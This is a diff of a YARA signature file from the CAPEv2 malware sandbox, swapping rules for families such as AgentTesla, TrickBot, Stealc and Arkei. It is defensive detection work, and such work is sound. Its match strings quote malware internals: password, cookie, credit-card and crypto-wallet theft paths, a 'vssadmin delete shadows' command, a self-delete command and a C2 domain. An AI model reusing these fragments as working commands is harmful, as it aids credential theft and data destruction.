-		$html_clipboard = "<br><span style=font-style:normal;text-decoration:none;text-transform:none;color:#FF0000;><strong>[clipboard]</strong></span>" wide ascii
+		$code1 = {41 0F B6 00 4D 8D 40 01 34 01 8B D7 83 E2 07 0F BE C8 FF C7 41 0F BE 04 91 0F AF C1 41 88 40 FF 81 FF 80 03 00 00 7C D8}
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5A4D and any of ( $code* )
 }
-rule CAPE_Agenttesla : FILE
+rule CAPE_Zeuspanda : FILE
 {
 	meta:
-		description = "AgentTesla Payload"
+		description = "ZeusPanda Payload"
 		author = "kevoreilly"
-		id = "f7b930f1-cecb-5d80-809b-9503f282247a"
+		id = "7891c021-6687-5457-b9e1-0beb0472647c"
 		date = "2019-10-30"
-		modified = "2026-01-14"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AgentTesla.yar#L19-L41"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "1bf9b26c4cf87e674ddffabe40aba5a45499c6a04d4ff3e43c3cda4cbcb4d188"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/ZeusPanda.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "43d8a56cae9fd23c053f6956851734d3270b46a906236854502c136e3bb1e761"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "AgentTesla Payload"
+		cape_type = "ZeusPanda Payload"
 
 	strings:
-		$string1 = "smtp" wide
-		$string2 = "appdata" wide
-		$string3 = "76487-337-8429955-22614" wide
-		$string4 = "yyyy-MM-dd HH:mm:ss" wide
-		$string6 = "webpanel" wide
-		$string7 = "<br>UserName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:" wide
-		$string8 = "<br>IP Address&nbsp;&nbsp;:" wide
-		$agt1 = "IELibrary.dll" ascii
-		$agt2 = "C:\\Users\\Admin\\Desktop\\IELibrary\\IELibrary\\obj\\Debug\\IELibrary.pdb" ascii
-		$agt3 = "GetSavedPasswords" ascii
-		$agt4 = "GetSavedCookies" ascii
+		$code1 = {8B 01 57 55 55 55 55 55 55 53 51 FF 50 0C 85 C0 78 E? 55 55 6A 03 6A 03 55 55 6A 0A FF 37}
+		$code2 = {8D 85 B0 FD FF FF 50 68 ?? ?? ?? ?? 8D 85 90 FA FF FF 68 0E 01 00 00 50 E8 ?? ?? ?? ?? 83 C4 10 83 F8 FF 7E ?? 68 04 01 00 00 8D 85 B0 FD FF FF}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $string* ) or 3 of ( $agt* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Agentteslav2 : FILE
+
+rule CAPE_Nighthawk
 {
 	meta:
-		description = "AgenetTesla Type 2 Keylogger payload"
-		author = "ditekshen"
-		id = "e60ecee4-0a97-56a1-b21e-47190f8cd1f8"
-		date = "2019-10-30"
-		modified = "2026-01-14"
+		description = "NightHawk C2"
+		author = "Nikhil Ashok Hegde <@ka1do9>"
+		id = "096b9d13-6aa7-5b6e-aaeb-e25aa7c8c53f"
+		date = "2022-12-03"
+		modified = "2022-12-05"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AgentTesla.yar#L43-L67"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "b45296b3b94fa1ff32de48c94329a17402461fb6696e9390565c4dba9738ed78"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Nighthawk.yar#L3-L24"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "2d77912678e06503ffef0e8ed84aa4f9ac74357480d57742fbae619acebfb5f2"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "AgentTesla Payload"
+		tags = ""
+		cape_type = "Nighthawk Payload"
 
 	strings:
-		$s1 = "get_kbHook" ascii
-		$s2 = "GetPrivateProfileString" ascii
-		$s3 = "get_OSFullName" ascii
-		$s4 = "get_PasswordHash" ascii
-		$s5 = "remove_Key" ascii
-		$s6 = "FtpWebRequest" ascii
-		$s7 = "logins" fullword wide
-		$s8 = "keylog" fullword wide
-		$s9 = "1.85 (Hash, version 2, native byte-order)" wide
-		$cl1 = "Postbox" fullword ascii
-		$cl2 = "BlackHawk" fullword ascii
-		$cl3 = "WaterFox" fullword ascii
-		$cl4 = "CyberFox" fullword ascii
-		$cl5 = "IceDragon" fullword ascii
-		$cl6 = "Thunderbird" fullword ascii
+		$keying_methods = { 85 C9 74 43 83 E9 01 74 1C 83 F9 01 0F 85 }
+		$aes_sbox = { 63 7C 77 7B F2 6B 6F C5 30 }
+		$aes_inv_sbox = { 52 09 6A D5 30 36 A5 38 BF }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( 6 of ( $s* ) and 2 of ( $cl* ) )
+		pe.is_pe and for any s in pe.sections : ( s.name == ".profile" ) and all of them
 }
-rule CAPE_Agentteslav3 : FILE
+rule CAPE_Fareit : FILE
 {
 	meta:
-		description = "AgentTeslaV3 infostealer payload"
-		author = "ditekshen"
-		id = "c8ddd838-6ad4-56f3-a0cd-b890f809018c"
+		description = "Fareit Payload"
+		author = "kevoreilly"
+		id = "b3c4eb86-d104-5f31-afa4-5bf5f370f64e"
 		date = "2019-10-30"
-		modified = "2026-01-14"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AgentTesla.yar#L69-L115"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "cc9bbbcf3608b49a76b098acf846ff03eae5e9cb107697627d62661fa1be36c2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Fareit.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "ed35391ffc949219f380da3f22bc8397a7d5c742bd68e227c3becdebcab5cf83"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "AgentTesla payload"
+		cape_type = "Fareit Payload"
 
 	strings:
-		$s_specific1 = "get_kbok" fullword ascii
-		$s_specific2 = "get_CHoo" fullword ascii
-		$s_specific3 = "KillTorProcess" fullword ascii
-		$s_specific4 = "GetMozilla" ascii
-		$s_specific5 = "torbrowser" wide
-		$s_specific6 = "bot%telegramapi%" wide
-		$s_specific7 = "%chatid%" wide
-		$s_typo = "set_Lenght" fullword ascii
-		$m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time" ascii
-		$m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii
-		$m3 = ">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii
-		$m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii
-		$m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii
-		$s_generic1 = "set_UseShellExecute" fullword ascii
-		$s_generic2 = "set_IsBodyHtml" fullword ascii
-		$s_generic3 = "set_AllowAutoRedirect" fullword ascii
-		$s_generic4 = "set_RedirectStandardOutput" fullword ascii
+		$string1 = {0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 31 20 20 09 20 20 67 6F 74 6F 20 09 0D 20 6B 74 6B 0D 0A 20 64 65 6C 20 09 20 20 25 30 20 00}
 
 	condition:
-		(2 of ( $m* ) ) or ( uint16( 0 ) == 0x5a4d and ( 5 of ( $s_specific* ) or ( $s_typo and 4 of ( $s_generic* ) ) ) )
+		uint16( 0 ) == 0x5A4D and any of ( $string* )
 }
-rule CAPE_Agentteslav4 : FILE
+rule CAPE_Aurastealer
 {
 	meta:
-		description = "AgentTesla Payload"
-		author = "kevoreilly"
-		id = "a39109ca-84cb-527d-b9c2-d8763fa6e496"
-		date = "2019-10-30"
-		modified = "2026-01-14"
+		description = "AuraStealer Payload"
+		author = "enzok"
+		id = "1fe058a8-1e87-51bb-8b5c-914442bca2e5"
+		date = "2025-09-02"
+		modified = "2025-09-02"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AgentTesla.yar#L117-L130"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "0a39036f408728ab312a54ff3354453d171424f57f9a8f3b42af867be3037ca9"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AuraStealer.yar#L1-L18"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "960b83639a898509dc272f3235822401a8f861fa6607991993285b618b882d8b"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "AgentTesla Payload"
-		packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c"
+		tags = ""
+		cape_type = "AuraStealer Payload"
+		unpacked = "a9c47f10d5eb77d7d6b356be00b4814a7c1e5bb75739b464beb6ea03fc36cc85"
+		packed = "bac52ffc8072893ff26cdbf1df1ecbcbb1762ded80249d3c9d420f62ed0dc202"
 
 	strings:
-		$decode1 = {(07|FE 0C 01 00) (07|FE 0C 01 00) 8E 69 (17|20 01 00 00 00) 63 8F ?? 00 00 01 25 47 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A D2 61 D2 52}
-		$decode2 = {(07|FE 0C 01 00) (08|FE 0C 02 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (11 07|FE 0C 07 00) 91 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A 61 D2 61 D2 52}
-		$decode3 = {(07|FE 0C 01 00) (11 07|FE 0C 07 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (08|FE 0C 02 00) 91 61 D2 52}
+		$conf = {8D BE ?? 00 00 00 68 00 40 00 00 5? 5? FF D1 83 C4 ?? 8B 07 8B 57 04 29 C2}
+		$key1 = {FF D2 8B 2B 8D 75 ?? 8B 5D ?? 33 5D ?? 8D 45}
+		$key2 = {89 0B 89 F9 5? 5? 5? E8 [4] 8B 3F 8D 6F 38 8B 77 30 33 77 34 8D 47 20 8D 4C 24 ?? 89 FA 5? E8}
+		$keyexpansion = {31 C0 8A 1C 82 88 1C 81 8A 5C 82 01 88 5C 81 01 8A 5C 82 02 88 5C 81 02 8A 5C 82 03 88 5C 81 03 4? 83 F8 08 75 ?? B? 08 00 00 00}
+		$antivm2 = {8B 43 04 8B 0D [4] 3B 81 [4] B? [2] 00 00 B? [2] 00 00 0F 44 D1 85 C0 0F 44 D1 8B 8A [4] 03 8A [4] FF E1 31 FF EB ?? 8B 78 0C 33 78 10 B? [4] 03 05 [4] FF D0}
+		$antivm1 = {39 04 11 0f 94 C3 8B 44 ?? ?? 85 C0}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		3 of them
 }
-rule CAPE_Icedid
+rule CAPE_Trickbot
 {
 	meta:
-		description = "IcedID Payload"
-		author = "kevoreilly, threathive"
-		id = "439342be-a1e6-5656-8813-5cebb0e88e98"
+		description = "TrickBot Payload"
+		author = "sysopfb & kevoreilly"
+		id = "dc88eadd-7b84-5bd0-96d1-aad480632bee"
 		date = "2019-10-30"
-		modified = "2021-12-16"
+		modified = "2023-02-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/IcedID.yar#L1-L18"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "e60ccbab7a360020744eba65961156ca3e2ae9cf23671014f913d71c1a96a331"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/TrickBot.yar#L1-L20"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "47cc2070b43957601a72745329a9d14fb3fbfd4d2b31cacc35d4ac750dde31ea"
 		score = 75
-		quality = 45
+		quality = 70
 		tags = ""
-		cape_type = "IcedID Payload"
+		cape_type = "TrickBot Payload"
 
 	strings:
-		$crypt1 = {8A 04 ?? D1 C? F7 D? D1 C? 81 E? 20 01 00 00 D1 C? F7 D? 81 E? 01 91 00 00 32 C? 88}
-		$crypt2 = {8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3}
-		$crypt3 = {41 00 8B C8 C1 E1 08 0F B6 C4 66 33 C8 66 89 4? 24 A1 ?? ?? 41 00 89 4? 20 A0 ?? ?? 41 00 D0 E8 32 4? 32}
-		$download1 = {8D 44 24 40 50 8D 84 24 44 03 00 00 68 04 21 40 00 50 FF D5 8D 84 24 4C 01 00 00 C7 44 24 28 01 00 00 00 89 44 24 1C 8D 4C 24 1C 8D 84 24 4C 03 00 00 83 C4 0C 89 44 24 14 8B D3 B8 BB 01 00 00 66 89 44 24 18 57}
-		$download2 = {8B 75 ?? 8D 4D ?? 8B 7D ?? 8B D6 57 89 1E 89 1F E8 [4] 59 3D C8 00 00 00 75 05 33 C0 40 EB}
-		$major_ver = {0F B6 05 ?? ?? ?? ?? 6A ?? 6A 72 FF 75 0C 6A 70 50 FF 35 ?? ?? ?? ?? 8D 45 80 FF 35 ?? ?? ?? ?? 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 ?? ?? ?? ?? 83 C4 38 8B E5 5D C3}
-		$stage_2_request_binary = "id="
-		$stage_2_request_img = ".png"
+		$str1 = "<moduleconfig>*</moduleconfig>" ascii wide
+		$str2 = "group_tag" ascii wide
+		$str3 = "client_id" ascii wide
+		$code1 = {8A 11 88 54 35 F8 46 41 4F 89 4D F0 83 FE 04 0F 85 7E 00 00 00 8A 1D ?? ?? ?? ?? 33 F6 8D 49 00 33 C9 84 DB 74 1F 8A 54 35 F8 8A C3 8D 64 24 00}
+		$code2 = {8B 4D FC 8A D1 02 D2 8A C5 C0 F8 04 02 D2 24 03 02 C2 88 45 08 8A 45 FE 8A D0 C0 FA 02 8A CD C0 E1 04 80 E2 0F 32 D1 8B 4D F8 C0 E0 06 02 45 FF 88 55 09 66 8B 55 08 66 89 11 88 41 02}
+		$code3 = {0F B6 54 24 49 0F B6 44 24 48 48 83 C6 03 C0 E0 02 0F B6 CA C0 E2 04 C0 F9 04 33 DB 80 E1 03 02 C8 88 4C 24 40 0F B6 4C 24 4A 0F B6 C1 C0 E1 06 02 4C 24 4B C0 F8 02 88 4C 24 42 24 0F}
+		$code4 = {53 8B 5C 24 18 55 8B 6C 24 10 56 8B 74 24 18 8D 9B 00 00 00 00 8B C1 33 D2 F7 F3 41 8A 04 2A 30 44 31 FF 3B CF 75 EE 5E 5D 5B 5F C3}
+		$code5 = {50 0F 31 C7 44 24 04 01 00 00 00 8D 0C C5 00 00 00 00 F7 C1 F8 07 00 00 74 1B 48 C1 E2 20 48 8B C8 48 0B CA 0F B6 C9 C1 E1 03 F7 D9 C1 64 24 04 10 FF C1 75 F7 59 C3}
+		$code6 = {53 8B 5C 24 0C 56 8B 74 24 14 B8 ?? ?? ?? ?? F7 E9 C1 FA 02 8B C2 C1 E8 1F 03 C2 6B C0 16 8B D1 2B D0 8A 04 1A 30 04 31 41 3B CF 75 DD 5E 5B 5F C3}
+		$code7 = {B8 ?? ?? 00 00 85 C9 74 32 BE ?? ?? ?? ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? BB ?? ?? ?? ?? 03 F2 8B 2B 83 C3 04 33 2F 83 C7 04 89 29 83 C1 04 3B DE 0F 43 DA}
 
 	condition:
-		any of ( $crypt* , $download* , $major_ver ) and all of ( $stage_2_request_* )
+		all of ( $str* ) or any of ( $code* )
 }
-rule CAPE_Xenorat
+rule CAPE_Trickbot_Permadll_UEFI_Module
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "jeFF0Falltrades"
-		id = "9708158d-06fc-5991-a084-df2bfe1d5c96"
-		date = "2024-10-09"
-		modified = "2024-10-09"
+		description = "Detects TrickBot Banking module permaDll"
+		author = "@VK_Intel | Advanced Intelligence"
+		id = "ba104164-0a1a-5a4c-8312-7653f7818e96"
+		date = "2019-10-30"
+		modified = "2023-02-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/XenoRAT.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "26f520fb69a52d05786fac0e9e38f5db9601da0a3e7768e00975a9684f3560ef"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/TrickBot.yar#L22-L38"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "491115422a6b94dc952982e6914adc39"
+		logic_hash = "564055f56fd19bed8900e6d451ba050b4e9013a9208a3bdc3d3d563567d225d2"
 		score = 75
-		quality = 66
+		quality = 70
 		tags = ""
-		cape_type = "XenoRAT payload"
 
 	strings:
-		$str_xeno_rat_1 = "xeno rat" wide ascii nocase
-		$str_xeno_rat_2 = "xeno_rat" wide ascii nocase
-		$str_xeno_update_mgr = "XenoUpdateManager" wide ascii
-		$str_nothingset = "nothingset" wide ascii
-		$byte_enc_dec_pre = { 1f 10 8d [4] (0a | 0b) }
-		$patt_config = { 72 [3] 70 80 [3] 04 }
+		$module_cfg = "moduleconfig"
+		$str_imp_01 = "Start"
+		$str_imp_02 = "Control"
+		$str_imp_03 = "FreeBuffer"
+		$str_imp_04 = "Release"
+		$module = "user_platform_check.dll"
+		$intro_routine = { 83 ec 40 8b ?? ?? ?? 53 8b ?? ?? ?? 55 33 ed a3 ?? ?? ?? ?? 8b ?? ?? ?? 56 57 89 ?? ?? ?? a3 ?? ?? ?? ?? 39 ?? ?? ?? ?? ?? 75 ?? 8d ?? ?? ?? 89 ?? ?? ?? 50 6a 40 8d ?? ?? ?? ?? ?? 55 e8 ?? ?? ?? ?? 85 c0 78 ?? 8b ?? ?? ?? 85 ff 74 ?? 47 57 e8 ?? ?? ?? ?? 8b f0 59 85 f6 74 ?? 57 6a 00 56 e8 ?? ?? ?? ?? 83 c4 0c eb ??}
 
 	condition:
-		4 of them and #patt_config >= 5
+		6 of them
 }
-rule CAPE_Atlas : FILE
+rule CAPE_Kpot : FILE
 {
 	meta:
-		description = "Atlas Payload"
+		description = "Kpot Stealer"
 		author = "kevoreilly"
-		id = "22322e5c-ded6-56df-8a39-a8f5cbc18239"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "724fd6ac-e734-5952-b459-01cbaffdb89d"
+		date = "2020-10-19"
+		modified = "2020-10-19"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Atlas.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "c3f73b29df5caf804dbfe3e6ac07a9e2c772bd2a126f0487e4a65e72bd501e6e"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Kpot.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "75abaab9a10e8ac8808425c389238285ab9bd9cb76f0cd03cc1e35b3ea0a1b0f"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Atlas Payload"
+		cape_type = "Kpot Payload"
 
 	strings:
-		$a1 = "bye.bat"
-		$a2 = "task=knock&id=%s&ver=%s x%s&disks=%s&other=%s&ip=%s&pub="
-		$a3 = "process call create \"cmd /c start vssadmin delete shadows /all /q"
+		$format = "%s | %s | %s | %s | %s | %s | %s | %d | %s"
+		$username = "username:s:"
+		$os = "OS: %S x%d"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
 rule CAPE_Hermes : FILE
 {
@@ -65845,8 +65607,8 @@ rule CAPE_Hermes : FILE
 		date = "2019-10-30"
 		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Hermes.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Hermes.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
 		logic_hash = "9bc974173f39a57e7adfbf8ae106a20d960557696b4c3ce16e9b4e47d3e9e95b"
 		score = 75
 		quality = 70
@@ -65861,475 +65623,717 @@ rule CAPE_Hermes : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and all of ( $* )
 }
-rule CAPE_Mykings : FILE
+rule CAPE_Stealc : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "YungBinary"
-		id = "c9d7b061-b76c-595c-a362-6c89c96093d9"
-		date = "2025-10-24"
-		modified = "2025-10-26"
-		reference = "https://x.com/YungBinary/status/1981108948498333900"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/MyKings.yar#L1-L23"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "82647dd23c0247faa045893ec1cf111da2a30528a1b737b59ce1b71172a64473"
+		description = "Stealc Payload"
+		author = "kevoreilly"
+		id = "77567584-7c84-5351-938b-d29d612a042d"
+		date = "2023-02-22"
+		modified = "2025-08-21"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Stealc.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d"
+		logic_hash = "a6165168b7c74761b91d1691465688c748227b830813067edb4e9bdc934271c4"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "MyKings Payload"
+		cape_type = "Stealc Payload"
 
 	strings:
-		$s1 = "login.php?uid=0" wide
-		$s2 = "download.txt?rnd=" wide
-		$s3 = "AcceptOK" ascii
-		$s4 = "winsta0\\default" wide
-		$s5 = "base64_ip.txt" wide
-		$s6 = { 70 00 6F 00 77 00 65 00 72 00 74 00 6F 00 6F 00 6C 00 00 00 6B 00 61 00 73 00 70 00 65 00 72 00 73 00 6B 00 79 }
-		$s7 = { 53 00 61 00 66 00 65 00 00 00 00 00 45 00 73 00 65 00 74 }
-		$s8 = { 4E 00 6F 00 64 00 33 00 32 00 00 00 4D 00 61 00 6C 00 77 00 61 00 72 00 65 }
-		$s9 = "Custom C++ HTTP Client/1.0" wide
-		$s10 = "/ru \"SYSTEM\" /f" ascii
-		$s11 = "cmd.exe /C timeout /t 1 & del " wide
-		$s12 = "/login.aspx?uid=0" wide
-		$s13 = "cmd-230812.ru" base64
+		$nugget1 = {68 04 01 00 00 6A 00 FF 15 [4] 50 FF 15}
+		$nugget2 = {64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00 8B 40 18 89 45 FC}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and all of them
+}
+rule CAPE_Stealcv2 : FILE
+{
+	meta:
+		description = "Stealc V2 Payload"
+		author = "kevoreilly"
+		id = "0f72c468-9485-5e29-b29a-7dfc3e579e02"
+		date = "2023-02-22"
+		modified = "2025-08-21"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Stealc.yar#L15-L32"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "911c6a7f63e91a788898f3cc6e66396e39d5bd48f8fbaac49ee5dbbdaa64d5a0"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		cape_type = "Stealc Payload"
+		packed = "2f42dcf05dd87e6352491ff9d4ea3dc3f854df53d548a8da0c323be42df797b6"
+		packed = "8301936f439f43579cffe98e11e3224051e2fb890ffe9df680bbbd8db0729387"
+
+	strings:
+		$decode32 = {AB AB AB AB 8B 45 0C 89 4E 10 89 4E 14 39 45 08 75 0B C7 46 14 0F 00 00 00 88 0E EB 0F 2B 45 08 50 51 FF 75 ?? 8B}
+		$dump32 = {33 C0 89 46 30 88 46 34 89 46 38 89 46 3C 89 46 40 89 46 44 89 46 48 89 46 4C 89 46 50 89 46 54 89 46 58 8B C6 5F 5E C3}
+		$date32 = {F3 A5 8D 45 ?? 50 E8 [4] 59 8B F8 8B F2 8D 45 A4 50 E8 [4] 59 3B F2 7C 08 7F 04 3B F8 76 02 B3 01 8A C3}
+		$decode64 = {40 53 48 83 EC 20 48 8B 19 48 85 DB 74 ?? 48 8B 53 18 48 83 FA 0F 76 2C 48 8B 0B 48 FF C2 48 81 FA 00 10 00 00 72}
+		$dump64 = {48 8B C7 89 6F 40 40 88 6F 44 48 89 6F 48 48 89 6F 50 48 89 6F 58 48 89 6F 60 48 89 6F 68 48 89 6F 70 48 89 6F 78 48 89}
+		$date64 = {0F 11 44 [2] 0F 11 8C [2] 00 00 00 89 8C [2] 00 00 00 48 8D 4C [2] E8 [4] 48 8B D8 48 8D 4C [2] E8 [4] 48 3B D8 0F 9F C0}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and 2 of them
+}
+rule CAPE_Arkei : FILE
+{
+	meta:
+		description = "Arkei Payload"
+		author = "kevoreilly, YungBinary"
+		id = "18363a5b-46f3-5d11-9bc6-a91f81b49706"
+		date = "2019-10-30"
+		modified = "2025-01-10"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Arkei.yar#L1-L50"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "296e420880d8d2f24424d0411e7ef4939e18147689557512f410da48498a44c9"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		cape_type = "Arkei Payload"
+
+	strings:
+		$string1 = "Windows_Antimalware_Host_System_Worker"
+		$string2 = "Arkei"
+		$string3 = "Bitcoin\\wallet.dat"
+		$string4 = "Ethereum\\keystore"
+		$v1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide
+		$v2 = "/c taskkill /im " fullword ascii
+		$v3 = "card_number_encrypted FROM credit_cards" ascii
+		$v4 = "\\wallet.dat" ascii
+		$v5 = "Arkei/" wide
+		$v6 = "files\\passwords." ascii wide
+		$v7 = "files\\cc_" ascii wide
+		$v8 = "files\\autofill_" ascii wide
+		$v9 = "files\\cookies_" ascii wide
+		$loaded_modules = {
+            64 A1 30 00 00 00
+            8B 40 0C
+            8B 40 0C
